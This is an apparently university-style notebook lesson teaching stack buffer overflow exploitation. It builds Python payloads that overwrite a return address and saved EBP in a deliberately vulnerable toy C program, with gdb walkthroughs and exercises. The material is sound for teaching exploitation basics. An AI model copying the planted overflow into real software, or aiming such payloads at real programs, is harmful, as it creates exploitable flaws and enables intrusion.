# Control Flow Hijacking

The previous notebook ended on a bit of a cliffhanger. We overflowed a buffer and overwrote the return address on the stack. I implied we could use that for even more evil purposes. Let's get to business!

At the end of every function, we execute a return instruction. Return pops the return address off the stack and starts executing at that address. With our buffer overflow, we now control the return address. If we're clever about what we put into the buffer, we can use the overflow to redirect execution to a new destination. This is called **control flow hijacking**. That's our mission in this notebook. We're hijackers!

Let's demonstrate the concept with a simplified version of the code we used in the previous notebook. In "buffojack.c", you'll find the following C program.

In [None]:
#include <stdio.h>

int bar(){
    printf("This code never gets executed.\n");
    return 0;
}

int foo(){
    char buff[128];
    printf("Enter your name:\n");
    /* Deliberate bug: fgets may write up to 256 bytes into a 128-byte buffer. */
    fgets(buff,256,stdin);
    return 0;
}

int main(){
    foo();
    return 0;
}

If you run buffojack, you'll see it's basically buffo without the nice message. We got rid of the print statements to simplify things and added a new function named "bar". "bar" does nothing, because it never gets called... does it?

## Finding Our Target

Let's call "bar" without changing the C code. Let's hijack control flow and point it at "bar". We'll use the buffer overflow to overwrite the return address. We'll overwrite it with the address of "bar".

First, let's find our target near the start of "bar". Running "gdb buffojack" and disassembling "bar", we see the following assembly code:

In [None]:
   0x080488a5 <+0>:     push   ebp
   0x080488a6 <+1>:     mov    ebp,esp
   0x080488a8 <+3>:     sub    esp,0x8 <----------- OUR TARGET
   0x080488ab <+6>:     sub    esp,0xc
   0x080488ae <+9>:     push   0x80ac248
   0x080488b3 <+14>:    call   0x804f940 <printf>
   0x080488b8 <+19>:    add    esp,0x10
   0x080488bb <+22>:    mov    eax,0x0
   0x080488c0 <+27>:    leave
   0x080488c1 <+28>:    ret

We crashed "buffo" by overwriting the return address in "foo". Let's do the same thing here, but more carefully. The plan is to hijack control flow at the "ret" instruction that ends the function "foo".

At the point we plan to hijack the program, the call stack is set up expecting us to go back to "main" and finish execution. We're not going to do that. Instead, we're going to jump into "bar". This means we need to set things up so "bar" acts like the end of "main". When "bar" finishes executing, the program itself will finish.

"main" already executed its prologue, so we'll need to skip the prologue in "bar". This way, the epilogue for "bar" will undo the prologue from "main" and our program will exit gracefully. This means we want to jump right to the first sub instruction, at memory address 0x080488a8.

So we need to overflow the buffer and overwrite the return address with the value 0x080488a8. That address is the target destination.

## Overwriting the Return Address

As in the previous notebook, we'll build our input using Python. We'll continue in the grand tradition of using 'A's to overflow the buffer. We need a way to put our target address into the buffer. Fortunately, there's a function called "pack" in the "struct" library that will store an integer as a series of bytes. It even takes care of the "endianness" problem, properly reversing the order of the bytes for us. If that's confusing, don't worry about the details. Just trust that the "pack" function puts an integer into our string in the proper format.
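
To make the byte reversal concrete, here is a small check of what "pack" does with our target. It assumes Python 3 (for the "hex" method on bytes). The format string "<I" asks for a little-endian, unsigned 32-bit integer, which is the byte order x86 uses in memory.

```python
from struct import pack, unpack

target = 0x080488a8

# "<I" means little-endian, unsigned 32-bit integer.
packed = pack("<I", target)

# The least significant byte (0xa8) comes first in memory.
print(packed.hex())                    # a8880408

# Unpacking with the same format recovers the original integer.
(recovered,) = unpack("<I", packed)
print(hex(recovered))                  # 0x80488a8
```

Those four bytes are the same ones you'll see at the end of the string our script prints.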

All this Python program does is build and print a string of bytes. You can run it in Jupyter to see the string.

In [4]:
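#!/usr/bin/python

from struct import pack

target=0x080488a8   # address of the first "sub" instruction in bar
overflow=120        # number of filler bytes placed before the target

# Filler 'A's followed by the target as 4 little-endian bytes.
buff=b"A"*overflow+pack("<I",target)

print(buff)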

b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xa8\x88\x04\x08'


We want to use this as input to buffojack while we're debugging. Let's redirect its output into a file.

./buffojack1.py > input.txt
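
This redirect relies on "print" writing the raw bytes, which is what Python 2 does. Under Python 3, "print(buff)" writes the text b'AAAA...' instead, so the file would not contain the bytes we want. If that's your situation, here is a minimal sketch of a Python 3 variant. The helper names "build_payload" and "write_payload" are made up for illustration, and the script is meant to be run from the command line rather than in a notebook cell.

```python
import sys
from struct import pack

def build_payload(overflow, target):
    """Filler bytes followed by the little-endian target address."""
    return b"A" * overflow + pack("<I", target)

def write_payload(payload, stream=None):
    """Write raw bytes, plus the newline print would add, to a binary stream."""
    if stream is None:
        stream = sys.stdout.buffer   # binary view of stdout in Python 3
    stream.write(payload + b"\n")
    stream.flush()

if __name__ == "__main__":
    write_payload(build_payload(120, 0x080488a8))
```

The trailing newline is kept so the file matches what "print" would have produced.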

Now, we can run gdb again.

gdb buffojack

Then we can run buffojack on our input with this command:

run < input.txt

Nothing happens. The program runs normally. We're not quite overflowing the buffer yet: our input is 124 bytes plus a newline, which still fits inside the 128-byte buffer. Disassemble "foo" and set a breakpoint on its "ret" instruction. This is the exact moment we want to take control.

disas foo

In [None]:
   0x080488c2 <+0>:     push   ebp
   0x080488c3 <+1>:     mov    ebp,esp
   0x080488c5 <+3>:     sub    esp,0x88
   0x080488cb <+9>:     sub    esp,0xc
   0x080488ce <+12>:    push   0x80ac0e7
   0x080488d3 <+17>:    call   0x8050440 <puts>
   0x080488d8 <+22>:    add    esp,0x10
   0x080488db <+25>:    mov    eax,ds:0x80d949c
   0x080488e0 <+30>:    sub    esp,0x4
   0x080488e3 <+33>:    push   eax
   0x080488e4 <+34>:    push   0x100
   0x080488e9 <+39>:    lea    eax,[ebp-0x88]
   0x080488ef <+45>:    push   eax
   0x080488f0 <+46>:    call   0x804ff90 <fgets>
   0x080488f5 <+51>:    add    esp,0x10
   0x080488f8 <+54>:    mov    eax,0x0
   0x080488fd <+59>:    leave
   0x080488fe <+60>:    ret

We set a breakpoint on the final "ret" instruction with this command:

break \*0x080488fe

Now, let's rerun the program:

run < input.txt

Now we're at that breakpoint. If we view the top of the stack, we see that the proper return address is about to get popped off the stack.

x/wx $esp

The value at the top of the stack should be 0x08048915. You can disassemble "main" to see that this address returns into it. Let's look at the memory just before ESP and try to find out how far away our buffer is. That'll let us know how much further we need to overflow the stack. This command starts 44 bytes before ESP and prints 12 words, ending with the word at ESP itself.

x/12wx $esp-44

In [None]:
0xffffd370:     0x41414141      0x41414141      0x41414141      0x41414141
0xffffd380:     0x41414141      0x41414141      0x080488a8      0x0804000a
0xffffd390:     0x00000001      0x0804f00b      0xffffd3a8      0x08048915

Each of the 0x41414141 patterns we see is a run of four ASCII 'A's. After all the 'A's, we see the target address 0x080488a8 we put into the buffer. That's the end of our input, apart from the trailing newline (the 0a at the bottom of the next word). There are four more values, then 0x08048915. Is that value familiar? It's the return address! It sits 5 words past the spot where our target landed, so we need to overflow 5 more 32-bit words to push our target address into the spot that the return address currently occupies. That means we need to add 20 more 'A's to our overflow string.
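
If counting words by eye feels error-prone, the same arithmetic can be done in Python. This is just a sketch: it pastes in the three rows of debugger output from above and uses two made-up helpers, "parse_words" and "address_of". Stack addresses can differ on your machine, so paste your own dump if it looks different.

```python
# The three rows printed by "x/12wx $esp-44" above, copied as text.
dump = """\
0xffffd370:     0x41414141      0x41414141      0x41414141      0x41414141
0xffffd380:     0x41414141      0x41414141      0x080488a8      0x0804000a
0xffffd390:     0x00000001      0x0804f00b      0xffffd3a8      0x08048915
"""

def parse_words(text):
    """Map each 32-bit word's address to its value."""
    words = {}
    for line in text.splitlines():
        base, values = line.split(":")
        for i, value in enumerate(values.split()):
            words[int(base, 16) + 4 * i] = int(value, 16)
    return words

def address_of(words, value):
    """Return the lowest address holding the given value."""
    return min(addr for addr, word in words.items() if word == value)

words = parse_words(dump)
target_at = address_of(words, 0x080488a8)   # where our target landed
return_at = address_of(words, 0x08048915)   # where the return address lives

gap = return_at - target_at
print(hex(target_at), hex(return_at), gap)  # 0xffffd388 0xffffd39c 20
print("new overflow:", 120 + gap)           # new overflow: 140
```

The gap of 20 bytes matches the 5 words we counted by hand.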

Fix the script so the variable "overflow" has the right value. When you do, you should be able to run the Python script to build the input, start the debugger, and run the program with the new overflow.

./buffojack1.py > input.txt  
gdb buffojack  
run < input.txt  

If you've got it right, you should see this output:

This code never gets executed.

Program received signal SIGSEGV, Segmentation fault.  
0x080488c0 in bar ()

You did it! You hijacked control flow! Welcome to being evil!

Slight problem, though. You also made the program crash. Not a very smooth hijacking. What happened? Well... you broke EBP.

## Fixing EBP

The previous value of EBP lives right before the return address on the stack, at the next lower address. That's why we always see the instruction sequence "leave" and then "ret". "leave" resets ESP and pops off the previous value of EBP, then "ret" pops off the return address. When we overflowed the buffer with 'A's to get our target address in the right spot, we also overflowed the old value of EBP and filled it with 'A's. We need to fix that.
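
Here is a toy model of that "leave" and "ret" pair, to show how the 'A's end up in EBP. It is only a sketch under simplifying assumptions: the stack is a Python bytearray, the buffer is 8 bytes instead of the real one, the base address 0x1000 is made up, and "make_frame" and "leave_ret" are hypothetical helpers.

```python
from struct import pack, unpack_from

BASE = 0x1000                 # hypothetical address of the start of our toy stack
BUF_SIZE = 8                  # toy buffer, much smaller than the real one

def make_frame(saved_ebp, return_addr):
    """Lay out [buffer][saved EBP][return address] from low to high addresses."""
    return bytearray(BUF_SIZE) + pack("<II", saved_ebp, return_addr)

def leave_ret(stack, ebp):
    """Simulate 'leave' then 'ret'; return the new (ebp, eip)."""
    esp = ebp                                          # leave: mov esp, ebp
    (new_ebp,) = unpack_from("<I", stack, esp - BASE)  # leave: pop ebp
    esp += 4
    (eip,) = unpack_from("<I", stack, esp - BASE)      # ret: pop eip
    return new_ebp, eip

frame_ebp = BASE + BUF_SIZE   # EBP points at the saved EBP slot

# Normal return: both saved values survive.
stack = make_frame(saved_ebp=0xffffd3a8, return_addr=0x08048915)
print([hex(v) for v in leave_ret(stack, frame_ebp)])
# ['0xffffd3a8', '0x8048915']

# Overflow with 'A's up to the return address, then the target.
payload = b"A" * (BUF_SIZE + 4) + pack("<I", 0x080488a8)
stack[:len(payload)] = payload
print([hex(v) for v in leave_ret(stack, frame_ebp)])
# ['0x41414141', '0x80488a8']
```

In the second run, execution goes where we want, but EBP is now 0x41414141. The next "leave" would try to use that as a stack address, which is the crash we saw in "bar".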

Instead of 'A's, let's put the proper value of EBP into our buffer overflow. When building our buffer overflow, the value *right* before our target *should* be the proper old value of EBP. We don't want 'A's. How can we find the proper value? What *should* be in EBP?

Let's just check what EBP is when everything works properly. Start gdb and set a breakpoint on the instruction we used to hijack control flow (the final "ret" instruction of "foo"):

break \*0x080488fe

Now run the program normally ("run") and input your name. You should hit the breakpoint. When you do, what value is in EBP? You can check with this command:

info registers

"buffojack2.py" has some Python code that should build the right overflow. You'll have to set the proper values of "ebp_value" and "overflow" though. "buffojack2.py" looks like this:

In [5]:
#!/usr/bin/python

from struct import pack

target=0x080488a8
ebp_value=0x41414141
overflow=120

buff=b"A"*overflow+pack("<I",target)+pack("<I",target)

print(buff)

b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xa8\x88\x04\x08\xa8\x88\x04\x08'


If you set the values of the "overflow" and "ebp_value" variables correctly, you should be able to run buffojack in the debugger and get this output:

In [None]:
(gdb) run < input.txt
Starting program: /home/jupyter-rmc3832/buffo/buffojack < input.txt
Enter your name:
This code never gets executed.
[Inferior 1 (process 24900) exited normally]

Can you hijack control flow and gracefully exit the program?
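
Before feeding a payload to the debugger, it can help to double-check its layout. The sketch below uses a hypothetical helper named "describe_payload" and assumes the layout described in this section: filler bytes, then the saved EBP value, then the return address. The numbers are placeholders, not the answers.

```python
from struct import pack, unpack

def describe_payload(payload):
    """Split a payload into filler length, saved-EBP word, and return-address word."""
    filler, tail = payload[:-8], payload[-8:]
    ebp_word, ret_word = unpack("<II", tail)
    return len(filler), ebp_word, ret_word

# Placeholder values only; the real "overflow" and "ebp_value" are left to you.
example = b"A" * 16 + pack("<I", 0x11223344) + pack("<I", 0x080488a8)

filler_len, ebp_word, ret_word = describe_payload(example)
print(filler_len, hex(ebp_word), hex(ret_word))   # 16 0x11223344 0x80488a8
```

If the last word isn't your target, or the word before it isn't the EBP value you found, the payload is misaligned.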

## Exercises

You've already been issued the challenge for this lesson. Hijack control flow in "buffojack". Once you do, answer the following questions:

1) What were the values of "overflow" and "ebp_value" that cleanly hijacked execution? How did you find them? What does your buffojack2.py script look like?

2) Does your hijack work outside of the debugger? In other words, what happens if you run buffojack at the command line like this:

./buffojack < input.txt

Any guesses about why this happens?

**HINT:** People on [Stack Overflow](https://stackoverflow.com/questions/17775186/buffer-overflow-works-in-gdb-but-not-without-it) might know the answer.